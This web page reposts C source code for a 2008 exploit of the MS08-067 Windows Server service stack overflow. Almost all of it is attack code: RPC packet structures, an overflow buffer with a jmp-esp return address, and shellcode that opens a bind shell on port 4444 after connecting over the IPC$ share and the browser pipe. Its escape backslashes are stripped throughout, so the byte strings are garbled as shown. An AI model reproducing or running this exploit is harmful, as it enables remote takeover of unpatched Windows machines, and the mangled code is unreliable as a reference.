Home / os / win10

ms08-067..txt

Posted on 12 November 2008

/* MS08-067 Remote Stack Overflow Vulnerability Exploit Author: Polymorphours Email: Polymorphours@whitecell.org Homepage:http://www.whitecell.org Date: 2008-10-28 */ #include "stdafx.h" #include <winsock2.h> #include <Rpc.h> #include <stdio.h> #include <stdlib.h> #pragma comment(lib, "mpr") #pragma comment(lib, "Rpcrt4") #pragma comment(lib, "ws2_32") struct RPCBIND { BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; WORD MaxXmitFrag; WORD MaxRecvFrag; DWORD AssocGroup; BYTE NumCtxItems; WORD ContextID; WORD NumTransItems; GUID InterfaceUUID; WORD InterfaceVerMaj; WORD InterfaceVerMin; GUID TransferSyntax; DWORD SyntaxVer; }; struct RPCFUNC { BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; DWORD AllocHint; WORD ContextID; WORD Opnum; }; BYTE PRPC[0x48] = { 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; BYTE EXPLOIT[] = "x05x00" "x00x03x10x00x00x00xA4x00x00x00x01x00x00x00x94x00" "x00x00x00x00x1fx00" "x00x00x00x00" "x2Fx00x00x00x00x00x00x00x2Fx00x00x00" "x5cx00" "x41x00x5cx00x2ex00x2ex00x5cx00x2ex00x2ex00x5cx00" "x41x41" "x41x41x41x41" "x41x41x41x41" "x41x41x41x41" "x41x41x41x41" "x12x45xfax7f" // jmp esp "x90x8BxF4x81" "x3Ex90x90x90x90x74x04x4Ex4ExEBxF4x33xC9x33xDBxB1" "x01xC1xE1x09x8BxFCx4BxC1xE3x0Dx23xFBx57xF3xA4x5F" // "xB1x01xC1xE1x09x2BxE1xFFxE7x41x41x41x41x41x41x41" "x83xECx70x90x90x90x90xFFxE7x41x41x41x41x41x41x41" "x00x00x00x00x01x00" "x00x00x02x00x00x00x00x00x00x00x02x00x00x00x5Cx00" "x00x00" "x01x00x00x00x01x00x00x00"; BYTE POP[] =//stub header RPCFUNC structure "x05x00" "x00x03x10x00x00x00xE4x01x00x00x01x00x00x00xD4x01" "x00x00x00x00x1fx00" "x00x00x00x00" "xCFx00x00x00x00x00x00x00xCFx00x00x00" "x5cx00" "x41x00x5cx00x2ex00x2ex00x5cx00x2ex00x2ex00x5cx00" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90" "x90x90x90x90" "x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41x41xCCx41" "x00x00x00x00x01x00" "x00x00x02x00x00x00x00x00x00x00x02x00x00x00x5Cx00" "x00x00" "x01x00x00x00x01x00x00x00"; unsigned char bind_shellcode[] = // "xCC" // "x83xECx40" // sub esp, 0x70 "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xad" "x07xe6x4ax83xebxfcxe2xf4x51x6dx0dx07x45xfex19xb5" "x52x67x6dx26x89x23x6dx0fx91x8cx9ax4fxd5x06x09xc1" "xe2x1fx6dx15x8dx06x0dx03x26x33x6dx4bx43x36x26xd3" "x01x83x26x3exaaxc6x2cx47xacxc5x0dxbex96x53xc2x62" "xd8xe2x6dx15x89x06x0dx2cx26x0bxadxc1xf2x1bxe7xa1" "xaex2bx6dxc3xc1x23xfax2bx6ex36x3dx2ex26x44xd6xc1" "xedx0bx6dx3axb1xaax6dx0axa5x59x8exc4xe3x09x0ax1a" "x52xd1x80x19xcbx6fxd5x78xc5x70x95x78xf2x53x19x9a" "xc5xccx0bxb6x96x57x19x9cxf2x8ex03x2cx2cxeaxeex48" "xf8x6dxe4xb5x7dx6fx3fx43x58xaaxb1xb5x7bx54xb5x19" "xfex54xa5x19xeex54x19x9axcbx6fxf7x16xcbx54x6fxab" "x38x6fx42x50xddxc0xb1xb5x7bx6dxf6x1bxf8xf8x36x22" "x09xaaxc8xa3xfaxf8x30x19xf8xf8x36x22x48x4ex60x03" "xfaxf8x30x1axf9x53xb3xb5x7dx94x8exadxd4xc1x9fx1d" "x52xd1xb3xb5x7dx61x8cx2excbx6fx85x27x24xe2x8cx1a" "xf4x2ex2axc3x4ax6dxa2xc3x4fx36x26xb9x07xf9xa4x67" "x53x45xcaxd9x20x7dxdexe1x06xacx8ex38x53xb4xf0xb5" "xd8x43x19x9cxf6x50xb4x1bxfcx56x8cx4bxfcx56xb3x1b" "x52xd7x8exe7x74x02x28x19x52xd1x8cxb5x52x30x19x9a" "x26x50x1axc9x69x63x19x9cxffxf8x36x22x42xc9x06x2a" "xfexf8x30xb5x7dx07xe6x4a"; int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) { BYTE rbuf[0x1000]=""; DWORD dw=0; struct RPCBIND RPCBind; memcpy(&RPCBind,&PRPC,sizeof(RPCBind)); UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID); UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface); RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]); RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]); TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL); return 0; } int main(int argc, char* argv[]) { char *server; NETRESOURCE nr; char unc[MAX_PATH]; char szPipe[MAX_PATH]; HANDLE hFile; WSADATA wsa; int bwritten=0; BYTE rbuf[0x100]=""; DWORD dw; PVOID ptr = (PVOID)&POP; printf( " MS08-067 Remote Stack Overflow Vulnerability Exploit(POC) " ); printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27 " ); printf( "Thanks isno and PolyMeta " ); printf( "ShellCode Function: bindshell port:4444 " ); printf( "usage: %s [IP] ", argv[0] ); if ( argc != 2 ) { return 0; } if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) { printf( "WSAStartup failed " ); return 0; } memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1); server=argv[1]; _snprintf(unc, sizeof(unc), "\\%s\pipe", server); unc[sizeof(unc)-1] = 0; nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpRemoteName = unc; nr.lpProvider = NULL; printf( "connect %s ipc$ .... ", server ); if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) { printf( "failed " ); return 0; } else { printf( "success! " ); } _snprintf(szPipe, sizeof(szPipe),"\\%s\pipe\browser",server); printf( "open \\%s\pipe\browser ....", server ); hFile = CreateFile( szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if ( hFile == (HANDLE)-1 ) { printf( "failed! " ); return 0; } else { printf( "success! " ); } printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface " ); BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0"); printf( "Send shellcode .... " ); TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL); printf( "Send Exploit ...... " ); TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL); CloseHandle( hFile ); return 0; }

 

TOP